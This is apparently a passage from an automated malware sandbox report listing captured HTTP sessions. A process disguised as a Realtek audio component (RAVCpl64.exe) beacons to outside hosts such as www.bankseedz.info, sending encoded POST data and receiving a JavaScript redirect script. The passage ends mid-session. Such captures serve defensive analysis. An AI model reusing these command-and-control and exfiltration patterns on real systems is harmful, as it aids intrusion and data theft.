                                                                            Dec 3, 2024 18:55:39.471782923 CET751OUTData Raw: 20 2f 6e 32 63 39 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.11.204975923.225.159.42807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:41.998610020 CET6OUTData Raw: 50 4f 53 54
                                                                            Data Ascii: POST
                                                                            Dec 3, 2024 18:55:42.185931921 CET532INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                                            Dec 3, 2024 18:55:42.186125040 CET771OUTData Raw: 20 2f 6e 32 63 39 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.11.204976023.225.159.42807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:44.715244055 CET6OUTData Raw: 50 4f 53 54
                                                                            Data Ascii: POST
                                                                            Dec 3, 2024 18:55:44.900614977 CET532INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                                            Dec 3, 2024 18:55:44.900976896 CET7920OUTData Raw: 20 2f 6e 32 63 39 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.11.204976123.225.159.42807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:47.433063984 CET6OUTGET
                                                                            Data Raw:
                                                                            Data Ascii:
                                                                            Dec 3, 2024 18:55:47.620858908 CET532INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                                            Dec 3, 2024 18:55:47.621149063 CET482OUTData Raw: 2f 6e 32 63 39 2f 3f 32 4f 3d 33 78 2f 37 66 34 6e 7a 55 76 66 34 53 73 6d 71 7a 46 6e 54 66 67 39 53 78 4d 4d 6d 45 69 6c 6f 5a 73 38 51 45 4f 61 47 65 43 6b 54 4b 32 41 65 31 4a 42 72 67 32 7a 37 51 69 72 6c 36 57 66 50 42 45 46 49 75 58 52 65
                                                                            Data Ascii: /n2c9/?2O=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.11.204976246.30.211.38807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:53.443073034 CET761OUTPOST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 6f 72 59 56 50 2b 49 38 54 31 4a 78 35 76 6f 44 78 6d 33 75 6e 6c 48 68 4e 6b 4c 36 6b 74 57 76 55 37 76 64 74 4a 4c 70 41 45 45 32 6d 45 48 58 50 77 67 66 41 6f 4b 62 6a 2b 4e 69 61 61 36 72 75 45 4d 66 31 4f 38 7a 36 59 70 4c 6e 65 53 58 4f 45 4a 43 47 51 45 2b 35 6d 67 44 39 51 66 42 58 35 7a 32 46 32 33 69 76 4f 31 4e 79 5a 67 68 64 6d 33 49 71 59 41 52 6d 6f 34 52 34 44 30 6d 4b 32 57 36 37 65 56 46 4a 4f 47 34 64 4b 76 79 5a 36 35 6f 72 33 56 54 59 6a 6e 4c 61 68 39 46 6e 6d 72 73 39 6d 46 34 70 6e 49 32 42 66 6b 47 4e 43 6f 58 71 41 3d 3d
                                                                            Data Ascii: 2O=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65or3VTYjnLah9Fnmrs9mF4pnI2BfkGNCoXqA==
                                                                            Dec 3, 2024 18:55:53.682337046 CET738INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:55:53 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.11.204976346.30.211.38807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:56.215830088 CET781OUTPOST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 62 6d 76 55 62 66 64 73 49 4c 70 4f 6b 45 32 31 45 48 57 58 51 67 41 41 6f 50 6d 6a 2b 78 69 61 61 75 72 75 42 6f 66 31 39 55 77 72 59 70 4a 76 2b 53 56 4b 45 4a 43 47 51 45 2b 35 6d 6c 4c 39 51 48 42 58 49 44 32 58 45 66 6a 7a 65 31 4f 7a 5a 67 68 5a 6d 32 67 71 59 41 2f 6d 70 6b 33 34 46 77 6d 4b 7a 53 36 37 72 70 4b 65 65 47 45 5a 4b 75 57 55 61 45 4b 6b 48 31 62 53 67 4f 59 64 6a 68 59 6d 77 6d 32 67 55 78 63 71 30 55 45 46 76 64 75 50 41 70 4d 33 47 52 6a 65 49 4d 30 2b 4e 32 4d 65 5a 4c 36 39 33 55 58 2f 6b 6b 3d
                                                                            Data Ascii: 2O=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0UEFvduPApM3GRjeIM0+N2MeZL693UX/kk=
                                                                            Dec 3, 2024 18:55:56.454977036 CET738INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:55:56 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.11.204976446.30.211.38807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:55:58.994667053 CET2578OUTPOST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 59 47 76 55 6f 6e 64 71 72 7a 70 4e 6b 45 32 32 45 48 54 58 51 67 4a 41 6f 32 74 6a 2b 38 41 61 5a 57 72 75 6e 30 66 6b 38 55 77 69 59 70 4a 6a 65 53 49 4f 45 4a 58 47 51 55 69 35 6c 4e 4c 39 51 48 42 58 4b 62 32 48 47 33 6a 78 65 31 4e 79 5a 67 6c 64 6d 32 62 71 59 59 4a 6d 70 78 4d 35 31 51 6d 4b 54 69 36 35 35 42 4b 64 2b 47 38 65 4b 75 4f 55 61 49 38 6b 48 70 68 53 68 37 46 64 67 42 59 6e 52 44 48 33 52 51 48 33 79 51 75 50 39 39 56 4d 57 6b 61 77 33 51 64 56 4f 51 59 30 59 47 6c 65 36 4c 6e 6d 44 6f 58 72 7a 55 35 45 73 57 59 47 6c 64 64 38 2f 69 5a 69 7a 36 79 7a 30 6c 4e 32 2f 50 66 76 79 69 56 6c 79 6f 4f 59 7a 42 39 70 67 46 63 46 75 77 44 42 58 6e 33 4e 46 4c 69 68 37 46 59 4a 2f 68 4e 34 79 74 52 34 46 30 39 47 64 41 59 62 2f 52 68 56 72 71 61 56 44 73 41 52 32 75 55 48 55 47 56 32 47 69 68 49 4c 4d 69 30 53 31 70 72 57 49 6b 78 46 52 52 66 74 6a 42 61 49 35 [TRUNCATED]
                                                                            Data Ascii: 2O=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnYGvUondqrzpNkE22EHTXQgJAo2tj+8AaZWrun0fk8UwiYpJjeSIOEJXGQUi5lNL9QHBXKb2HG3jxe1NyZgldm2bqYYJmpxM51QmKTi655BKd+G8eKuOUaI8kHphSh7FdgBYnRDH3RQH3yQuP99VMWkaw3QdVOQY0YGle6LnmDoXrzU5EsWYGldd8/iZiz6yz0lN2/PfvyiVlyoOYzB9pgFcFuwDBXn3NFLih7FYJ/hN4ytR4F09GdAYb/RhVrqaVDsAR2uUHUGV2GihILMi0S1prWIkxFRRftjBaI5NlMtsTxL80LGa9XfZodUUKAw9wecK0G6Bhl1vMaxm5glg3RDBvZplqHDNBZsVUkHBYd2+F0oaunxUkn44eiT8FRFCZmGAA3637UlJDr0HUJqr45BKAtUkb95M3tqJ5OSeFzn2lbmYJw+Jkk1CMX+KRhqP68QexGyIKvF4tzf28lO3Q4bknuSfPv5Psv/sSKG8tJB1WGwX2VtuSCVsHwl1yCbbl4pDK40QJ0rVRio/RHS8NMTHCVdMrwd8aBf+21eea8ZCIbKkXnmVJIaY925vYAhZZmAFqDEzag+xuIWhtJDVGKm1HO3H5PLC1ZjBvNvsN3GFdfPjSQu9CaDmgt5VRBZe5+r5KizFYBbbvnwqaICf0fJncqUBQfm9O78vy8gKStIPt/ub8FhQNua2BY4p+SLTCvb9jHZVg7wLInFYPBDK1qjN7Y7Q1EsRwZuRj882cpymHvZyGGoOnZMOMTkYCwHeiZs4xYdRjFcme4Bqtvx5cnncFKWdOVt25NXUqtxD/LoCGQQe1hvVxGo9sI1AwvH2I7LdfzMOHR24HYRYc+RLJXSevKocgKX6Kr4U6JF8MKD9dzQQnI+EnvRaxAwPVtdP7+HwVCCa6kUa04XFtOXlHKbqI8OYdRKCcJXQ972JFrYFQ4bLB3RYnvpyigq3Db8pxP63dS3a6 [TRUNCATED]
                                                                            Dec 3, 2024 18:55:58.994745016 CET5352OUTData Raw: 61 46 4f 63 7a 2f 61 73 7a 76 43 47 45 4c 66 67 76 35 52 48 6c 4d 74 2b 39 66 6c 4b 72 58 50 6c 69 4b 64 4c 31 4a 4f 62 39 45 2b 4e 5a 4c 31 6f 57 59 69 65 75 6f 79 42 7a 79 45 45 55 4b 4c 69 42 68 70 71 6c 39 61 78 66 6f 65 72 56 62 33 6b 44 55
                                                                            Data Ascii: aFOcz/aszvCGELfgv5RHlMt+9flKrXPliKdL1JOb9E+NZL1oWYieuoyBzyEEUKLiBhpql9axfoerVb3kDUbvjQoEvpQYQbWNj1eaWR75i4mzsF3XEEUBbDfJ7SNXJ6vKbhjepBEMIyADgbJFwws1XfGO0KALshh7YoHukS2bFEFNVlTi9vOX67BUhOQXEXrXlbLSEjnX6oU1cKq13YEUsEKM69xh1jKDF4Brh6geVfKakDKxABW
                                                                            Dec 3, 2024 18:55:59.251279116 CET738INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:55:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.11.204976546.30.211.38807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:01.760416985 CET488OUTGET /uf7y/?2O=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:02.000062943 CET738INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:56:01 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
